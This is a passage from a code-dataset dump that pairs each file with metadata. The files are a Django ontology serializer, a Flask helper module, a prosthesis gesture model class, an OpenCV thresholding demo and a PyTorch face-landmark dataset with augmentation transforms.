from Q.questionnaire.q_utils import serialize_model_to_dict
from Q.questionnaire.q_constants import *
class QOntologySerializer(QSerializer):
    """DRF serializer for QOntology, exposing computed title and the
    document types an ontology supports."""

    class Meta:
        model = QOntology
        fields = (
            'id',
            'name',
            'version',
            'documentation',
            'file',
            'title',
            "url",
            'created',
            'modified',
            'ontology_type',
            'is_registered',
            'is_active',
            'key',
            'document_types',
        )
        # there is no need to explicitly add QUniqueTogetherValidator
        # b/c that is done automatically in "QSerializer.get_unique_together_validators()"
        # validators = [
        #     QUniqueTogetherValidator(
        #         queryset=QModelCustomization.objects.all(),
        #         # fields=('name', 'version'),
        #     )
        # ]

    version = QVersionSerializerField()
    title = serializers.SerializerMethodField()  # method_name defaults to "get_title"
    document_types = serializers.SerializerMethodField(method_name="get_supported_document_types")

    def get_title(self, obj):
        """Return the ontology's display title (its __str__ representation)."""
        return str(obj)

    def get_supported_document_types(self, obj):
        """
        returns the model_proxies of the current ontology that can be used to create documents
        ie: those w/ the stereotype "document" and that are listed in SUPPORTED_DOCUMENTS
        :param obj:
        :return:
        """
        # Case-insensitive exact-name match against the supported CIM2 names.
        supported_document_model_proxies = obj.model_proxies.filter(
            is_document=True,
            name__iregex=r'(' + '|'.join(["^{0}$".format(sd) for sd in SUPPORTED_DOCUMENTS["CIM2"]]) + ')',
        ).order_by("name")
        return [
            serialize_model_to_dict(
                model_proxy,
                include={
                    "title": str(model_proxy),
                    "name": model_proxy.name.lower()
                },
                exclude=["guid", "created", "modified", "ontology"]
            )
            for model_proxy in supported_document_model_proxies
        ]
| 34.777778 | 115 | 0.611999 | .models_ontologies import QOntology
from Q.questionnaire.q_utils import serialize_model_to_dict
from Q.questionnaire.q_constants import *
class QOntologySerializer(QSerializer):
class Meta:
model = QOntology
fields = (
'id',
'name',
'version',
'documentation',
'file',
'title',
"url",
'created',
'modified',
'ontology_type',
'is_registered',
'is_active',
'key',
'document_types',
)
on = QVersionSerializerField()
title = serializers.SerializerMethodField()
document_types = serializers.SerializerMethodField(method_name="get_supported_document_types")
def get_title(self, obj):
return str(obj)
def get_supported_document_types(self, obj):
supported_document_model_proxies = obj.model_proxies.filter(
is_document=True,
name__iregex=r'(' + '|'.join(["^{0}$".format(sd) for sd in SUPPORTED_DOCUMENTS["CIM2"]]) + ')',
).order_by("name")
return [
serialize_model_to_dict(
model_proxy,
include={
"title": str(model_proxy),
"name": model_proxy.name.lower()
},
exclude=["guid", "created", "modified", "ontology"]
)
for model_proxy in supported_document_model_proxies
]
| true | true |
f726102b761a9e6adbb75d3300ca03971c3cffb7 | 533 | py | Python | app/util.py | mkhumtai/6CCS3PRJ | c7d5bedf9529f6e2b7a57e102761716c11f961c8 | [
"MIT"
] | null | null | null | app/util.py | mkhumtai/6CCS3PRJ | c7d5bedf9529f6e2b7a57e102761716c11f961c8 | [
"MIT"
] | null | null | null | app/util.py | mkhumtai/6CCS3PRJ | c7d5bedf9529f6e2b7a57e102761716c11f961c8 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
"""
Flask Boilerplate
Author: AppSeed.us - App Generator
"""
from flask import json
from app import app, db
from .common import *
# build a Json response
def response(data):
return app.response_class(response=json.dumps(data),
status=200,
mimetype='application/json')
def g_db_commit():
db.session.commit()
def g_db_add(obj):
if obj:
db.session.add(obj)
def g_db_del(obj):
if obj:
db.session.delete(obj)
| 16.65625 | 58 | 0.594747 |
from flask import json
from app import app, db
from .common import *
def response(data):
return app.response_class(response=json.dumps(data),
status=200,
mimetype='application/json')
def g_db_commit():
db.session.commit()
def g_db_add(obj):
if obj:
db.session.add(obj)
def g_db_del(obj):
if obj:
db.session.delete(obj)
| true | true |
f726102cba78d004ea78e8999b8ab8ecc337e74b | 968 | py | Python | arm_prosthesis/models/gesture.py | paulrozhkin/arm_prosthesis_raspberry | a643dc84109f1d516fa2ca50414f95f408d6da7d | [
"MIT"
] | 2 | 2021-11-08T01:52:36.000Z | 2021-11-08T01:52:38.000Z | arm_prosthesis/models/gesture.py | paulrozhkin/arm_prosthesis_raspberry | a643dc84109f1d516fa2ca50414f95f408d6da7d | [
"MIT"
] | null | null | null | arm_prosthesis/models/gesture.py | paulrozhkin/arm_prosthesis_raspberry | a643dc84109f1d516fa2ca50414f95f408d6da7d | [
"MIT"
] | 1 | 2020-11-08T16:45:23.000Z | 2020-11-08T16:45:23.000Z | from typing import List
from arm_prosthesis.models.gesture_action import GestureAction
class Gesture:
def __init__(self, uuid: str, name: str, last_time_sync: int, iterable: bool, repetitions: int,
actions: List[GestureAction]):
self._uuid = uuid
self._name = name
self._last_time_sync = last_time_sync
self._iterable = iterable
self._repetitions = repetitions
self._actions = actions
@property
def uuid(self) -> str:
return self._uuid
@property
def name(self) -> str:
return self._name
@property
def last_time_sync(self) -> int:
return self._last_time_sync
@property
def iterable(self) -> bool:
return self._iterable
@property
def repetitions(self) -> int:
return self._repetitions
@property
def actions(self) -> List[GestureAction]:
return self._actions
| 24.820513 | 100 | 0.615702 | from typing import List
from arm_prosthesis.models.gesture_action import GestureAction
class Gesture:
def __init__(self, uuid: str, name: str, last_time_sync: int, iterable: bool, repetitions: int,
actions: List[GestureAction]):
self._uuid = uuid
self._name = name
self._last_time_sync = last_time_sync
self._iterable = iterable
self._repetitions = repetitions
self._actions = actions
@property
def uuid(self) -> str:
return self._uuid
@property
def name(self) -> str:
return self._name
@property
def last_time_sync(self) -> int:
return self._last_time_sync
@property
def iterable(self) -> bool:
return self._iterable
@property
def repetitions(self) -> int:
return self._repetitions
@property
def actions(self) -> List[GestureAction]:
return self._actions
| true | true |
f726106467d8fad1a2a9e799965ebffea0070438 | 2,395 | py | Python | image-manipulation-processing/thresholding.py | mozbatman/Basic-Opencv-Example | e00aab203064e3e0f225c6aa062997aabe05ccdb | [
"MIT"
] | null | null | null | image-manipulation-processing/thresholding.py | mozbatman/Basic-Opencv-Example | e00aab203064e3e0f225c6aa062997aabe05ccdb | [
"MIT"
] | null | null | null | image-manipulation-processing/thresholding.py | mozbatman/Basic-Opencv-Example | e00aab203064e3e0f225c6aa062997aabe05ccdb | [
"MIT"
] | null | null | null | ## Thresholding = Giriş olarak verilen görüntüyü ikili görüntüye çevirmek için kullanılan bir yöntemdir. İkili görüntü (binary), görüntünün siyah ve beyaz olarak tanımlanmasıdır.
# Morfolojik operatörler gibi görüntü üzerindeki gürültüleri azaltmak veya nesne belirlemek gibi farklı amaçlar için kullanılır.
import cv2
import numpy as np
# Load our image as greyscale
image = cv2.imread('../images/gradient.jpg',0)
cv2.imshow('Original', image)
# Values below 127 goes to 0 (black, everything above goes to 255 (white)
ret,thresh1 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY)
cv2.imshow('1 Threshold Binary', thresh1)
# Values below 127 go to 255 and values above 127 go to 0 (reverse of above)
ret,thresh2 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY_INV)
cv2.imshow('2 Threshold Binary Inverse', thresh2)
# Values above 127 are truncated (held) at 127 (the 255 argument is unused)
ret,thresh3 = cv2.threshold(image, 127, 255, cv2.THRESH_TRUNC)
cv2.imshow('3 THRESH TRUNC', thresh3)
# Values below 127 go to 0, above 127 are unchanged
ret,thresh4 = cv2.threshold(image, 127, 255, cv2.THRESH_TOZERO)
cv2.imshow('4 THRESH TOZERO', thresh4)
# Resever of above, below 127 is unchanged, above 127 goes to 0
ret,thresh5 = cv2.threshold(image, 127, 255, cv2.THRESH_TOZERO_INV)
cv2.imshow('5 THRESH TOZERO INV', thresh5)
cv2.waitKey(0)
cv2.destroyAllWindows()
image = cv2.imread('../images/Origin_of_Species.jpg', 0)
cv2.imshow('Original', image)
cv2.waitKey(0)
# Values below 127 goes to 0 (black, everything above goes to 255 (white)
ret,thresh1 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY)
cv2.imshow('Threshold Binary', thresh1)
cv2.waitKey(0)
# It's good practice to blur images as it removes noise
image = cv2.GaussianBlur(image, (3, 3), 0)
# Using adaptiveThreshold
thresh = cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_MEAN_C,
cv2.THRESH_BINARY, 3, 5)
cv2.imshow("Adaptive Mean Thresholding", thresh)
cv2.waitKey(0)
_, th2 = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
cv2.imshow("Otsu's Thresholding", thresh)
cv2.waitKey(0)
# Otsu's thresholding after Gaussian filtering
blur = cv2.GaussianBlur(image, (5,5), 0)
_, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
cv2.imshow("Guassian Otsu's Thresholding", thresh)
cv2.waitKey(0)
cv2.destroyAllWindows() | 38.015873 | 179 | 0.746555 | cv2.imshow('1 Threshold Binary', thresh1)
ret,thresh2 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY_INV)
cv2.imshow('2 Threshold Binary Inverse', thresh2)
ret,thresh3 = cv2.threshold(image, 127, 255, cv2.THRESH_TRUNC)
cv2.imshow('3 THRESH TRUNC', thresh3)
ret,thresh4 = cv2.threshold(image, 127, 255, cv2.THRESH_TOZERO)
cv2.imshow('4 THRESH TOZERO', thresh4)
ret,thresh5 = cv2.threshold(image, 127, 255, cv2.THRESH_TOZERO_INV)
cv2.imshow('5 THRESH TOZERO INV', thresh5)
cv2.waitKey(0)
cv2.destroyAllWindows()
image = cv2.imread('../images/Origin_of_Species.jpg', 0)
cv2.imshow('Original', image)
cv2.waitKey(0)
ret,thresh1 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY)
cv2.imshow('Threshold Binary', thresh1)
cv2.waitKey(0)
image = cv2.GaussianBlur(image, (3, 3), 0)
# Using adaptiveThreshold
thresh = cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_MEAN_C,
cv2.THRESH_BINARY, 3, 5)
cv2.imshow("Adaptive Mean Thresholding", thresh)
cv2.waitKey(0)
_, th2 = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
cv2.imshow("Otsu's Thresholding", thresh)
cv2.waitKey(0)
blur = cv2.GaussianBlur(image, (5,5), 0)
_, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
cv2.imshow("Guassian Otsu's Thresholding", thresh)
cv2.waitKey(0)
cv2.destroyAllWindows() | true | true |
f726110264ab39655e21d921ad0fde90f93c841c | 15,517 | py | Python | face_alignment/FaceLandmarksDataset.py | Efreeto/face-alignment | d496866ac3d66c8353ba3e0305f16ac8a2ccc017 | [
"BSD-3-Clause"
] | 2 | 2018-03-22T01:46:49.000Z | 2020-11-06T06:58:01.000Z | face_alignment/FaceLandmarksDataset.py | Efreeto/face-alignment | d496866ac3d66c8353ba3e0305f16ac8a2ccc017 | [
"BSD-3-Clause"
] | null | null | null | face_alignment/FaceLandmarksDataset.py | Efreeto/face-alignment | d496866ac3d66c8353ba3e0305f16ac8a2ccc017 | [
"BSD-3-Clause"
] | null | null | null | import torch
from torch.utils.data import Dataset
from skimage import io, color, transform
import torchvision
import os, glob
import numpy as np
import random
from scipy import ndimage
from PIL import Image
import torch.nn.functional as F
from . import utils
######################################################################
# Transforms
# ----------
#
# One issue we can see from the above is that the samples are not of the
# same size. Most neural networks expect the images of a fixed size.
# Therefore, we will need to write some prepocessing code.
# Let's create three transforms:
#
# - ``Rescale``: to scale the image
# - ``RandomCrop``: to crop from image randomly. This is data
# augmentation.
# - ``ToTensor``: to convert the numpy images to torch images (we need to
# swap axes).
#
# We will write them as callable classes instead of simple functions so
# that parameters of the transform need not be passed everytime it's
# called. For this, we just need to implement ``__call__`` method and
# if required, ``__init__`` method. We can then use a transform like this:
#
# ::
#
# tsfm = Transform(params)
# transformed_sample = tsfm(sample)
#
# Observe below how these transforms had to be applied both on the image and
# landmarks.
#
class Rescale(object):
"""Rescale the image in a sample to a given size.
Args:
output_size (tuple or tuple): Desired output size. If tuple, output is
matched to output_size. If int, smaller of image edges is matched
to output_size keeping aspect ratio the same.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
self.output_size = output_size
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
if isinstance(self.output_size, int):
if h > w:
new_h, new_w = self.output_size * h / w, self.output_size
else:
new_h, new_w = self.output_size, self.output_size * w / h
else:
new_h, new_w = self.output_size
new_h, new_w = int(new_h), int(new_w)
img = transform.resize(image, (new_h, new_w))
# h and w are swapped for landmarks because for images,
# x and y axes are axis 1 and 0 respectively
landmarks = landmarks * [new_w / w, new_h / h]
img = img.astype('float32')
landmarks = landmarks.astype('float32')
return {'image': img, 'landmarks': landmarks}
class RandomHorizFlip(object):
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
if random.random() < 0.5:
image = np.fliplr(image).copy()
landmarks = landmarks.transpose()
landmarks[0] = image.shape[1] - landmarks[0]
landmarks = landmarks.transpose()
landmarks = utils.shuffle_lr(landmarks)
return {'image': image, 'landmarks': landmarks}
__imagenet_stats = {'mean': [0.485, 0.456, 0.406],
'std': [0.229, 0.224, 0.225]}
imagenet_pca = {
'eigval': torch.Tensor([0.2175, 0.0188, 0.0045]),
'eigvec': torch.Tensor([
[-0.5675, 0.7192, 0.4009],
[-0.5808, -0.0045, -0.8140],
[-0.5836, -0.6948, 0.4203],
])
}
class Lighting(object):
"""Lighting noise(AlexNet - style PCA - based noise)"""
def __init__(self, alphastd=0.1, eigval=imagenet_pca['eigval'], eigvec=imagenet_pca['eigvec']):
self.alphastd = alphastd
self.eigval = eigval
self.eigvec = eigvec
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
if self.alphastd == 0:
return image
alpha = image.new().resize_(3).normal_(0, self.alphastd)
rgb = self.eigvec.type_as(image).clone()\
.mul(alpha.view(1, 3).expand(3, 3))\
.mul(self.eigval.view(1, 3).expand(3, 3))\
.sum(1).squeeze()
return {'image': image.add(rgb.view(3, 1, 1).expand_as(image)), 'landmarks': landmarks}
class FaceColorJitter(object):
def __init__(self, brightness=0.4, contrast=0.4, saturation=0.4):
self.color_jitter = torchvision.transforms.ColorJitter(brightness, contrast, saturation)
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks'].copy()
to_pil = torchvision.transforms.ToPILImage()
img = to_pil(image)
img = self.color_jitter(img)
to_tensor = torchvision.transforms.ToTensor()
image = to_tensor(img).numpy().transpose(1,2,0)
return {'image': image, 'landmarks': landmarks}
class RandomRotation(object):
def __init__(self, maximum_angle=50., minimum_angle=5.):
self.maximum_angle = maximum_angle - minimum_angle
self.minimum_angle = minimum_angle
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
rotation_angle = (random.random() - 0.5) * 2 * self.maximum_angle
if rotation_angle > 0:
rotation_angle += self.minimum_angle
else:
rotation_angle -= self.minimum_angle
manual_theta = utils.transformation_matrix(-rotation_angle)
manual_theta_inv = utils.transformation_matrix(rotation_angle)
image_rot = ndimage.rotate(image, rotation_angle, reshape=True)
origin_org = ((image.shape[1] / 2.0, image.shape[0] / 2.0))
origin_rot = ((image_rot.shape[1] / 2.0, image_rot.shape[0] / 2.0))
landmarks_rot = landmarks - origin_org
landmarks_rot = np.asarray(np.dot(landmarks_rot, manual_theta_inv)[:, :2])
landmarks_rot = landmarks_rot + origin_rot
sample['image_rot'] = image_rot
sample['landmarks_rot'] = landmarks_rot
sample['theta'] = manual_theta
sample['angle'] = rotation_angle
return sample
class LandmarkCrop(object):
def __init__(self, resolution):
self.resolution = resolution
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
bbox = utils.bounding_box(landmarks)
center, scale = utils.center_scale_from_bbox(bbox)
image = utils.crop(image, center, scale, self.resolution)
# landmarks = landmarks - (bbox[0], bbox[1])
sample['image'] = image
sample['landmarks'] = landmarks
if 'image_rot' in sample: # if RandomRotation, crop around the rotated image
image, landmarks = sample['image_rot'], sample['landmarks_rot']
bbox = utils.bounding_box(landmarks)
center, scale = utils.center_scale_from_bbox(bbox)
image = utils.crop(image, center, scale, self.resolution)
# landmarks = landmarks - (bbox[0], bbox[1])
sample['image_rot'] = image
sample['landmarks_rot'] = landmarks
return sample
class CreateHeatmaps(object):
def __init__(self, output_size=64, n_features=68):
self.output_size = output_size
self.n_features = n_features
def __call__(self, sample):
landmarks = sample['landmarks']
center, scale = utils.center_scale_from_bbox(utils.bounding_box(landmarks))
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
for i in range(self.n_features):
new_pts = utils.transform(landmarks[i], center, scale, self.output_size)
heatmap[i] = utils.draw_gaussian(heatmap[i], new_pts, 1)
sample['heatmaps'] = torch.from_numpy(heatmap).view(self.n_features, self.output_size, self.output_size).float()
if 'image_rot' in sample: # if RandomRotation, crop around the rotated image
landmarks = sample['landmarks_rot']
center, scale = utils.center_scale_from_bbox(utils.bounding_box(landmarks))
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
for i in range(self.n_features):
new_pts = utils.transform(landmarks[i], center, scale, self.output_size)
heatmap[i] = utils.draw_gaussian(heatmap[i], new_pts, 1)
sample['heatmaps_rot'] = torch.from_numpy(heatmap).view(self.n_features, self.output_size, self.output_size).float()
return sample
class CreateHeatmaps2(object):
def __init__(self, output_size=64, n_features=68):
self.output_size = output_size
self.n_features = n_features
if self.n_features==68:
self.neigbor_list = [[2],[1,3],[2,4],[3,5],[4,6],[5,7],[6,8],[7,9],[8,10],
[9,11],[10,12],[11,13],[12,14],[13,15],[14,16],[15,17],
[16], [19], [18,20], [19,21], [20,22], [21],[24],[23,25],
[24,26],[25,27],[26],[29],[28,30],[29,31],[30,34],[33],
[32,34],[33,35],[34,36],[35],[],[37,39],[38,40],[],[40,42],
[37,41],[],[43,45],[44,46],[],[46,48],[43,47],[],[49,51],
[50,52],[51,53],[52,54],[53,55],[],[55,57],[56,58],[57,59],
[58,60],[59,49],[49],[61,63],[62,64],[63,65],[55],[65,67],
[66,68],[61,67]]
elif self.n_features==108:
self.neigbor_list = [[2],[1,3],[2,4],[3,5],[4,6],[5,7],[6,8],[7,9],[8,10],
[9,11],[10,12],[11,13],[12,14],[13,15],[14,16],[15,17],
[16,18],[17,19],[18,20],[19,21],[20,22],[21,23],[22,24],
[23,25],[24,26],[25,27],[26,28],[27,29],[28,30],[29,31],
[30,32],[31,33],[32],[],[34,36],[35,37],[36,38],[], [39,41],
[40,42],[41,43], [],[45],[44,46], [45,47], [46], [49],[48,50],
[],[50,52],[51],[],[53,55],[54,56],[],[56,58], [],[],[59,61],
[60,62],[],[62,64],[],[],[65,67],[66,68],[],[],[69,71],[70,72],[]
[54,55],[58,57],[],[60,61],[63,64],[],[81],[82],[79,83],[80,84],
[81,85],[82,86],[83,87],[84,88],[48],[52],[],[89,91],[90,92],
[91,93],[92,94],[93,95],[],[95,97],[96,98],[97,99],[98,100],[89,99],
[],[101,103],[102,104],[103,105],[],[105,107],[106,108],[101,107]]
def __call__(self, sample):
landmarks = sample['landmarks']
center, scale = center_scale_from_landmark(landmarks)
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
foo = np.zeros((self.output_size, self.output_size))
for i in range(self.n_features):
neighbors = self.get_neighbors(i)
num_neighbors = len(neighbors)
if num_neighbors == 0:
heatmap[i] = utils.draw_gaussian(heatmap[i], utils.transform(landmarks[i], center, scale, self.output_size), 1)
foo = utils.draw_gaussian(foo, utils.transform(landmarks[i], center, scale, self.output_size), 1)
else:
if num_neighbors == 2:
points = np.zeros((3,2))
points[0] = utils.transform(landmarks[neighbors[0]-1], center, scale, self.output_size).numpy()
points[1] = utils.transform(landmarks[i], center, scale, self.output_size).numpy()
points[2] = utils.transform(landmarks[neighbors[1]-1], center, scale, self.output_size).numpy()
else:
points = np.zeros((2,2))
points[0] = utils.transform(landmarks[neighbors[0]-1], center, scale, self.output_size).numpy()
points[1] = utils.transform(landmarks[i], center, scale, self.output_size).numpy()
heatmap[i] = utils.draw_gaussian2(heatmap[i], points, 1)
# foo = utils.draw_gaussian(foo, utils.transform(landmarks[i], center, scale, self.output_size), 1)
foo = utils.draw_gaussian2(foo, points, 1)
"""
from PIL import Image
im = Image.fromarray(foo*255)
im.show()
"""
heatmaps = torch.from_numpy(heatmap).view(1, self.n_features, self.output_size, self.output_size).float()
return {'image': sample['image'], 'landmarks': heatmaps}
def get_neighbors(self, landmark):
return self.neigbor_list[landmark]
class RandomCrop(object):
"""Crop randomly the image in a sample.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
image = image[top: top + new_h,
left: left + new_w]
landmarks = landmarks - [left, top]
return {'image': image, 'landmarks': landmarks}
class ToTensor(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample):
for key in sample:
if key in ['image', 'image_rot']:
sample[key] = torchvision.transforms.ToTensor()(sample[key])
elif key in ['filename', 'angle', 'heatmaps', 'heatmaps_rot']:
continue
else:
sample[key] = torch.from_numpy(sample[key]).float()
return sample
class FaceLandmarksDataset(Dataset):
"""Face Landmarks dataset."""
def __init__(self, path, type=1, transforms=None):
"""
Args:
path (string): Directory with all the images and landmarks.
transforms (callable, optional): Optional transform to be applied
on a sample.
"""
self.type = type
self.transforms = transforms
image_exts = ('*.jpg', '*.png')
self.images_list = []
for ext in image_exts:
self.images_list.extend(sorted(glob.glob(os.path.join(path, ext))))
assert self.images_list, "path does not contain images"
def __len__(self):
return len(self.images_list)
def __getitem__(self, idx):
image = io.imread(self.images_list[idx])
image = color.grey2rgb(image) # For some gray scale images
filename = self.images_list[idx]
basename = os.path.splitext(filename)[0]
if self.type == 1: # 300W, lfpw
landmarks = np.loadtxt(basename + '.pts', skiprows=3, comments='}')
elif self.type == 2: # land110
landmarks = np.loadtxt(basename + '.land', skiprows=1)
# landmarks = np.vstack((landmarks[0:32:2], landmarks[32:64], landmarks[88:108]))
elif self.type == 3: # FEI
landmarks = np.ones((68,2))
elif self.type == 4: # 8W
landmarks = np.loadtxt(basename + '.pts')
sample = {'image': image, 'landmarks': landmarks, 'filename': filename}
if self.transforms:
sample = self.transforms(sample)
return sample
| 40.620419 | 128 | 0.577431 | import torch
from torch.utils.data import Dataset
from skimage import io, color, transform
import torchvision
import os, glob
import numpy as np
import random
from scipy import ndimage
from PIL import Image
import torch.nn.functional as F
from . import utils
rn image
alpha = image.new().resize_(3).normal_(0, self.alphastd)
rgb = self.eigvec.type_as(image).clone()\
.mul(alpha.view(1, 3).expand(3, 3))\
.mul(self.eigval.view(1, 3).expand(3, 3))\
.sum(1).squeeze()
return {'image': image.add(rgb.view(3, 1, 1).expand_as(image)), 'landmarks': landmarks}
class FaceColorJitter(object):
def __init__(self, brightness=0.4, contrast=0.4, saturation=0.4):
self.color_jitter = torchvision.transforms.ColorJitter(brightness, contrast, saturation)
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks'].copy()
to_pil = torchvision.transforms.ToPILImage()
img = to_pil(image)
img = self.color_jitter(img)
to_tensor = torchvision.transforms.ToTensor()
image = to_tensor(img).numpy().transpose(1,2,0)
return {'image': image, 'landmarks': landmarks}
class RandomRotation(object):
def __init__(self, maximum_angle=50., minimum_angle=5.):
self.maximum_angle = maximum_angle - minimum_angle
self.minimum_angle = minimum_angle
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
rotation_angle = (random.random() - 0.5) * 2 * self.maximum_angle
if rotation_angle > 0:
rotation_angle += self.minimum_angle
else:
rotation_angle -= self.minimum_angle
manual_theta = utils.transformation_matrix(-rotation_angle)
manual_theta_inv = utils.transformation_matrix(rotation_angle)
image_rot = ndimage.rotate(image, rotation_angle, reshape=True)
origin_org = ((image.shape[1] / 2.0, image.shape[0] / 2.0))
origin_rot = ((image_rot.shape[1] / 2.0, image_rot.shape[0] / 2.0))
landmarks_rot = landmarks - origin_org
landmarks_rot = np.asarray(np.dot(landmarks_rot, manual_theta_inv)[:, :2])
landmarks_rot = landmarks_rot + origin_rot
sample['image_rot'] = image_rot
sample['landmarks_rot'] = landmarks_rot
sample['theta'] = manual_theta
sample['angle'] = rotation_angle
return sample
class LandmarkCrop(object):
def __init__(self, resolution):
self.resolution = resolution
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
bbox = utils.bounding_box(landmarks)
center, scale = utils.center_scale_from_bbox(bbox)
image = utils.crop(image, center, scale, self.resolution)
sample['image'] = image
sample['landmarks'] = landmarks
if 'image_rot' in sample:
image, landmarks = sample['image_rot'], sample['landmarks_rot']
bbox = utils.bounding_box(landmarks)
center, scale = utils.center_scale_from_bbox(bbox)
image = utils.crop(image, center, scale, self.resolution)
sample['image_rot'] = image
sample['landmarks_rot'] = landmarks
return sample
class CreateHeatmaps(object):
def __init__(self, output_size=64, n_features=68):
self.output_size = output_size
self.n_features = n_features
def __call__(self, sample):
landmarks = sample['landmarks']
center, scale = utils.center_scale_from_bbox(utils.bounding_box(landmarks))
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
for i in range(self.n_features):
new_pts = utils.transform(landmarks[i], center, scale, self.output_size)
heatmap[i] = utils.draw_gaussian(heatmap[i], new_pts, 1)
sample['heatmaps'] = torch.from_numpy(heatmap).view(self.n_features, self.output_size, self.output_size).float()
if 'image_rot' in sample:
landmarks = sample['landmarks_rot']
center, scale = utils.center_scale_from_bbox(utils.bounding_box(landmarks))
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
for i in range(self.n_features):
new_pts = utils.transform(landmarks[i], center, scale, self.output_size)
heatmap[i] = utils.draw_gaussian(heatmap[i], new_pts, 1)
sample['heatmaps_rot'] = torch.from_numpy(heatmap).view(self.n_features, self.output_size, self.output_size).float()
return sample
class CreateHeatmaps2(object):
def __init__(self, output_size=64, n_features=68):
self.output_size = output_size
self.n_features = n_features
if self.n_features==68:
self.neigbor_list = [[2],[1,3],[2,4],[3,5],[4,6],[5,7],[6,8],[7,9],[8,10],
[9,11],[10,12],[11,13],[12,14],[13,15],[14,16],[15,17],
[16], [19], [18,20], [19,21], [20,22], [21],[24],[23,25],
[24,26],[25,27],[26],[29],[28,30],[29,31],[30,34],[33],
[32,34],[33,35],[34,36],[35],[],[37,39],[38,40],[],[40,42],
[37,41],[],[43,45],[44,46],[],[46,48],[43,47],[],[49,51],
[50,52],[51,53],[52,54],[53,55],[],[55,57],[56,58],[57,59],
[58,60],[59,49],[49],[61,63],[62,64],[63,65],[55],[65,67],
[66,68],[61,67]]
elif self.n_features==108:
self.neigbor_list = [[2],[1,3],[2,4],[3,5],[4,6],[5,7],[6,8],[7,9],[8,10],
[9,11],[10,12],[11,13],[12,14],[13,15],[14,16],[15,17],
[16,18],[17,19],[18,20],[19,21],[20,22],[21,23],[22,24],
[23,25],[24,26],[25,27],[26,28],[27,29],[28,30],[29,31],
[30,32],[31,33],[32],[],[34,36],[35,37],[36,38],[], [39,41],
[40,42],[41,43], [],[45],[44,46], [45,47], [46], [49],[48,50],
[],[50,52],[51],[],[53,55],[54,56],[],[56,58], [],[],[59,61],
[60,62],[],[62,64],[],[],[65,67],[66,68],[],[],[69,71],[70,72],[]
[54,55],[58,57],[],[60,61],[63,64],[],[81],[82],[79,83],[80,84],
[81,85],[82,86],[83,87],[84,88],[48],[52],[],[89,91],[90,92],
[91,93],[92,94],[93,95],[],[95,97],[96,98],[97,99],[98,100],[89,99],
[],[101,103],[102,104],[103,105],[],[105,107],[106,108],[101,107]]
def __call__(self, sample):
landmarks = sample['landmarks']
center, scale = center_scale_from_landmark(landmarks)
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
foo = np.zeros((self.output_size, self.output_size))
for i in range(self.n_features):
neighbors = self.get_neighbors(i)
num_neighbors = len(neighbors)
if num_neighbors == 0:
heatmap[i] = utils.draw_gaussian(heatmap[i], utils.transform(landmarks[i], center, scale, self.output_size), 1)
foo = utils.draw_gaussian(foo, utils.transform(landmarks[i], center, scale, self.output_size), 1)
else:
if num_neighbors == 2:
points = np.zeros((3,2))
points[0] = utils.transform(landmarks[neighbors[0]-1], center, scale, self.output_size).numpy()
points[1] = utils.transform(landmarks[i], center, scale, self.output_size).numpy()
points[2] = utils.transform(landmarks[neighbors[1]-1], center, scale, self.output_size).numpy()
else:
points = np.zeros((2,2))
points[0] = utils.transform(landmarks[neighbors[0]-1], center, scale, self.output_size).numpy()
points[1] = utils.transform(landmarks[i], center, scale, self.output_size).numpy()
heatmap[i] = utils.draw_gaussian2(heatmap[i], points, 1)
foo = utils.draw_gaussian2(foo, points, 1)
heatmaps = torch.from_numpy(heatmap).view(1, self.n_features, self.output_size, self.output_size).float()
return {'image': sample['image'], 'landmarks': heatmaps}
def get_neighbors(self, landmark):
return self.neigbor_list[landmark]
class RandomCrop(object):
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
image = image[top: top + new_h,
left: left + new_w]
landmarks = landmarks - [left, top]
return {'image': image, 'landmarks': landmarks}
class ToTensor(object):
def __call__(self, sample):
for key in sample:
if key in ['image', 'image_rot']:
sample[key] = torchvision.transforms.ToTensor()(sample[key])
elif key in ['filename', 'angle', 'heatmaps', 'heatmaps_rot']:
continue
else:
sample[key] = torch.from_numpy(sample[key]).float()
